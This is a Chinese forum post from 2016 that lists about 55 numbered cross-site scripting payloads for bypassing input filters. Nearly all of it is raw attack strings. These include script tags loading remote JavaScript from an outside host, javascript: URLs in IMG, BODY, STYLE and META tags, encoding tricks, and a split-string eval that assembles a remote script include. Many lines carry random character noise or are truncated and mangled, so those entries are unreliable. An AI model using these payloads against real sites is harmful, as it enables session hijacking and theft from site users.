(1)普通的XSS JavaScript注入
2 m1 Z% b# B! j( t<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># T, J- g! R3 Z% O
(99)另类弹框
0 I" T0 E( v9 e8 g7 S9 L2 W<q/oncut=alert()>1/ X' ]4 k& t G7 I: ^
<s/onclick=alert()>b
: z. [" i# j1 u: r <XSS=" onclick="alert(1)//">clickme</SSX=">$ K: ?+ Y/ P9 l. @
<zzz onclick=alert`1`>clickme</zzz>
+ w( e0 b) ?, A <a onclick=alert`1`>clickme</a>9 a, K) x0 K( y6 Q' R
<a=">clickme</a=">+ m7 P) w. z% c, U8 n
<a=">clickme</a>
; A# ~! J3 p7 P" `8 ~- R5 V<z=">clickme</z=">
! @; B* D; L2 b8 B+ j# x2 q2 ^% h<z onclick=alert`1`>clickme</z>& y$ j: e/ i; V! N7 T
* l* }1 v" x {, j$ t
(2)IMG标签XSS使用JavaScript命令
4 L1 m# }) _# [: W$ ^+ M% {3 {8 p<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# B- A2 E8 b8 d6 [5 h( z, {/ h2 @; |: G3 |3 T
(3)IMG标签无分号无引号
7 n. V% Z0 W! j' A; x! f<IMG SRC=javascript:alert(‘XSS’)>
# t! b2 y. E5 X& b: j
- ^: b1 D! x9 i* N# F' ^(4)IMG标签大小写不敏感" c1 n! i% v5 [% R) C
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ E) Z. [8 H6 ?7 x" Q4 s: X; _2 X+ n# R( n3 {( {
(5)HTML编码(必须有分号)& X) l) T& g% a% u& z
<IMG SRC=javascript:alert(“XSS”)>5 s* s4 e7 R3 P$ s4 m1 J' C7 W
0 T1 i( \9 b4 ~9 i+ y z8 ^(6)修正缺陷IMG标签
. P9 \: E# j! q; t1 o5 Y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
3 p3 Q6 |- @2 C4 t# F' l4 g8 B5 N4 V9 b7 s/ L$ R9 z
(7)formCharCode标签(计算器)
; u0 }1 c6 e+ F' H! C# @) l<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ x3 R- n9 E& s8 V! T/ D
W/ E; U2 R) s+ n5 Y(8)UTF-8的Unicode编码(计算器)9 t% J8 G+ \( \* @ s9 \, B% _: k
<IMG SRC=jav..省略..S')>! N0 _% S3 k- ~6 N1 u7 a
C* G4 O4 o4 p1 `7 E8 B(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
# X. C" }$ N' U! ]' B<IMG SRC=jav..省略..S')>
# s% {- Y9 D! e4 t% u% ~8 e# [+ g& z% p# [$ ~0 o1 Z
(10)十六进制编码也是没有分号(计算器)
' l9 b( C- s; k<IMG SRC=\'#\'" /span>
1 k( b2 E s7 O) i
9 J% `3 }: }3 \(11)嵌入式标签,将Javascript分开
0 A T" I6 @; V) B<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: R8 p8 ?+ q& A5 ?
0 D0 J/ _' b# p" @0 Z; j(12)嵌入式编码标签,将Javascript分开; U( ^4 }3 i1 v
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 l! n$ w# Q. {
" M! n& N2 x/ x4 x(13)嵌入式换行符2 P( J( q! X5 b; U8 ~, q1 Z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: E* Y9 D9 p3 p# |% e( c+ f( w/ Q& p+ z1 ~6 @: t3 u
(14)嵌入式回车
2 w! u3 z( D* q( Q<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. L$ i; F8 ^, `3 T8 H7 m- z: G! K# s. V4 ?/ R1 b
(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 T, e7 H' T0 o8 T/ M
<IMG SRC=\'#\'" /span>3 y* a+ Y/ ?7 `8 C8 ]$ I
+ X$ k% E* {# L/ D
(16)解决限制字符(要求同页面) ?8 S6 G! m; A- Z' v& A
<script>z=’document.’</script>
1 l) ?( M( E5 A6 _+ B, Z! n8 v<script>z=z+’write(“‘</script>
$ a5 z, T, O5 k2 t8 I; I) R6 s4 X<script>z=z+’<script’</script>; w/ c: G) r. A, f F1 P2 _
<script>z=z+’ src=ht’</script>
, v. n5 n6 X2 L a. |6 e" G<script>z=z+’tp://ww’</script>
* h* e) h4 z. O<script>z=z+’w.shell’</script>
. o; z4 ~0 E/ h' ]% P* N<script>z=z+’.net/1.’</script>
7 d U( W+ s S/ G* c K+ ?<script>z=z+’js></sc’</script>
% q6 S0 H6 G* D* ?6 Y<script>z=z+’ript>”)’</script>
: n( J6 t4 G& J; q% q/ C! y<script>eval_r(z)</script>
/ b: ?8 c# M0 [1 D' w
# j3 ^9 P9 F0 e(17)空字符. b3 }, ?* T. _# k; D
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
+ U. G$ A9 _* A, U* Y6 ]0 A; }* C) I3 {( S/ K) K# w! u- V
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) Z: W& B; |1 d. a6 v
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 B* l: s3 P& m& F! D# Q0 H$ I5 X. q" B1 n! k
(19)Spaces和meta前的IMG标签& J% [/ A- j P1 y# @
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”># N& R' ?; {7 |4 p1 x, e
$ ~2 z# t1 x& A$ a6 ]0 J
(20)Non-alpha-non-digit XSS' b- ~7 O B& R/ {
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
6 S4 S# K2 L2 n% M3 i9 L( o/ E' W9 p+ X# s7 I
(21)Non-alpha-non-digit XSS to 2. q2 W& L6 C! @. u9 m' E9 X
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>2 g, C" b0 c3 `4 X5 t# o8 T
# |! |1 q B- ?3 W- L: I
(22)Non-alpha-non-digit XSS to 3
# B2 d, Z/ n6 e( w0 c5 z9 R<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>8 |0 X. m1 Y5 ^% ^8 c! y f/ k
6 C o9 n2 S O- X3 o9 Z' h
(23)双开括号" F( l }3 Q" i
<<SCRIPT>alert(“XSS”);//<</SCRIPT>: ?$ x3 h$ H5 ~, [/ N
) D/ H7 t! y @6 n4 X' a5 g% Y(24)无结束脚本标记(仅火狐等浏览器)/ y1 E( b( G/ Z5 F8 @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B> t4 F1 u4 \5 J: R: _9 H3 L
: g4 O: C3 b9 u
(25)无结束脚本标记2
* q! C) @2 U( H8 m* g0 {2 U<SCRIPT SRC=//3w.org/XSS/xss.js>
+ h, `: A# U4 Y) L6 d
; V8 E8 H" H0 Q5 a% p% }; x(26)半开的HTML/JavaScript XSS4 K1 [4 H6 y- X) K, x" Y# i
<IMG SRC=\'#\'" /span>
5 I: V. |! [9 x% `. D4 z2 Z# x& |) p" I. Q$ b( S
(27)双开角括号
# A% Y- C1 v$ V3 t3 y1 N P: g<iframe src=http://3w.org/XSS.html <
h) H v8 U: G, y& _
. G8 H, q3 ]+ v; Y" V! ]. }(28)无单引号 双引号 分号
: ]* C/ u3 F0 x4 K( n' a<SCRIPT>a=/XSS/
) `6 Q! a- E2 b- ]% ]# e: Ralert(a.source)</SCRIPT>
4 v+ {+ n+ Y$ L# e
7 ? Q0 F4 g; r" ?(29)换码过滤的JavaScript
" @% e/ g+ M" w+ j\”;alert(‘XSS’);//1 K2 `; }4 v7 M* @
1 T s8 k( s* @3 M(30)结束Title标签
) f T. A* @$ M- H7 z</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 }; @; z4 H) r: \
0 [; ^, g E# x4 c2 w. @: @(31)Input Image" A! D# c$ P3 i1 h) ?. n" a) u
<INPUT SRC=\'#\'" /span> m9 n: F- w& p9 W/ Z
6 F3 T3 C- x7 s3 t* O5 R0 G/ C(32)BODY Image
/ P! k7 e" G" B4 E<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: n) m: j% N h5 e7 B
, I# a' W; }- d* Z3 O(33)BODY标签 a" M- r: W }6 \
<BODY(‘XSS’)>* \3 ~# s0 t3 p0 R/ X
! k- l* P' a9 a7 |4 B# F1 f- L8 X
(34)IMG Dynsrc2 }* X! {. E# [2 g$ _8 }
<IMG DYNSRC=\'#\'" /span>
. T2 s+ R% G2 n$ H3 f8 @. j0 T% @
# Q& y" n/ W0 W+ P1 i% u Y(35)IMG Lowsrc3 J( s2 j$ ~$ w% j$ ]3 B; {+ C
<IMG LOWSRC=\'#\'" /span>2 c. o3 ]- {* u- b. F/ @: K+ `' g
& r! {7 }3 j5 L, F. _
(36)BGSOUND
/ }) d0 u2 g1 w3 t5 K<BGSOUND SRC=\'#\'" /span>
* U4 B9 k. E% X( Y2 q) t' M; F# ~6 G0 T. Z0 Z
(37)STYLE sheet. q" a8 r% {& Y* _% |
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
% j' [. U& E3 c! d) z; @
( W& X, Y: H5 |; Q(38)远程样式表8 `1 [) n8 ? I# p: o$ I& i, @
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; e8 B% G+ o! l: g
0 m- U; Y/ _$ h: C+ Y6 G: i(39)List-style-image(列表式)8 e- w1 D1 l( d7 u- }
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 e+ t" W; ~0 y3 u
: `7 ?7 w# q0 }- A$ Y(40)IMG VBscript; d3 J2 O1 w e" H
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS' M$ T* p @# ~4 v& @
9 t) X# v; `6 h" L(41)META链接url9 w8 F+ d g1 h, Q+ H" W
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>* s# A% R3 y$ \; t0 q4 y) f
# G! B3 o: v- F L: r(42)Iframe
$ Z! s) \: ~" W1 s' P) f2 ~/ G9 {<IFRAME SRC=\'#\'" /IFRAME>
3 z: ?, v2 U6 I, H) o. A. k8 L" y* L' z* r
(43)Frame, u0 O+ w. b* S5 ?
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
0 D" x/ A3 V( e/ B! m% I. D8 t
4 g" i X7 x% S7 a: X+ g8 d8 J(44)Table
1 |; M" ?" ~: ^' Y* B: b( j<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* d; Q$ r: @: V- _% D5 S
! B$ U- R/ T# K( v A9 s& p2 v$ Y(45)TD% e |7 J3 H% W) s
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”># Y* i; ^( s c5 o, `" X X
1 }6 V- A$ G/ n" x: Z% U6 x
(46)DIV background-image9 ]# \% A; k! q
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ [* d4 K, N8 G( N2 J) L7 F9 M: J# G5 e$ D' E) w$ a
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)6 E e3 L9 F, y$ Y; x
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>5 ?3 `/ p% S4 h* i' {4 a
- N0 c I# |) ^; U3 P' O8 R; L
(48)DIV expression2 M; j+ |2 e8 G1 w& T
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
i: J `! |% i# l6 T$ N1 d* L( D$ f" ?
(49)STYLE属性分拆表达/ l s) Y+ E4 S5 c& i4 R
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
5 E5 W: f! v6 n9 r% d: k; d
. C: F; B2 v0 t) ^5 x- m( w5 y(50)匿名STYLE(组成:开角号和一个字母开头)
& p: G1 i8 n$ D. |<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
+ |3 v5 S% P: O' V# @6 p9 e$ u
1 F, t2 M9 T* A$ P* q+ p* z5 N(51)STYLE background-image/ x" e p- j2 ?
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
/ C% b2 h$ a6 |; ] |4 o5 c4 f
3 f( P( v, A* N2 D0 V' m' ^(52)IMG STYLE方式
* Z! d5 [( B4 Y, J$ R# m `' U, W( kexppression(alert(“XSS”))’>: f, X% T" _- }% T+ T, x
% p! h9 Q5 `. m8 S
(53)STYLE background: m3 B) p# X& t* ?
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! a2 {4 T( j5 s% m L: E6 b( R
+ g' _4 d' H3 V3 [! n# `(54)BASE
9 v7 |" |" w( d# l' t<BASE HREF=”javascript:alert(‘XSS’);//”>
" K( Z8 r% a& ^6 D: [. W3 |9 ?" Z8 A
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
% F0 j2 K' t6 G* C4 E<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>" J4 M* \4 W) m% L
|
发表于 2016-4-28 10:06:15
收藏
分享
支持
反对